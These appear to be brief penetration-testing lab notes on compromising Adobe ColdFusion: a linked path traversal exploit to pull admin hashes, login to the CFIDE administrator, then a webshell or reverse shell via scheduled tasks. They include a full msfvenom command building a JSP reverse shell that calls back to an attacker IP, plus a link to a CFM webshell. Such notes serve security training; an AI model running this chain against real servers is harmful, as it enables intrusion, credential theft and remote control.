Usually found under cfide dir

Path traversal vuln which allows to retrieve admin hashes :

https://www.exploit-db.com/exploits/14641

After cracking the hashes , the user can login via

[<http://10.11.6.40/CFIDE/administrator/enter.cfm>](<http://10.11.1.10/CFIDE/administrator/enter.cfm>) 

Then , in order to retrieve the dir browse to mappings section

Finally a webshell or revshell can be obtained via scheduled tasks section

JSP revshell via msf :

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.122 LPORT=8888 -f jsp -o shell.jsp

CFM Webshell

<https://github.com/Reboare/Cfm_Shell_v3.0_edition/blob/master/shell.cfm>